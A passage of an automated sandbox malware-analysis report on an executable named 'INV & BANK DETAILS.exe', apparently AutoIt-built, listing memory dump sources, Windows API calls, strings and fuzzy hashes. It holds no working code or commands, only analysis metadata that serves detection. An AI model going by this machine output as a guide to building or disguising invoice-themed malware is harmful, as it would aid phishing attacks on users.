                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                • String ID: @EXITCODE
                                • API String ID: 2734553683-3436989551
                                • Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                • Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                APIs
                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • wsprintfW.USER32 ref: 0045612A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend_mallocwsprintf
                                • String ID: %d/%02d/%02d
                                • API String ID: 1262938277-328681919
                                • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                APIs
                                • InternetCloseHandle.WININET(?), ref: 00442663
                                • InternetCloseHandle.WININET ref: 00442668
                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CloseHandleInternet$ObjectSingleWait
                                • String ID: aeB
                                • API String ID: 857135153-906807131
                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                APIs
                                Strings
                                • C:\Users\user\Desktop\INV & BANK DETAILS.exe, xrefs: 0043324B
                                • ^B, xrefs: 00433248
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcsncpy
                                • String ID: ^B$C:\Users\user\Desktop\INV & BANK DETAILS.exe
                                • API String ID: 1735881322-2465150816
                                • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                • PostMessageW.USER32(00000000), ref: 00441C05
                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Message_doexit
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 1993061046-4017498283
                                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D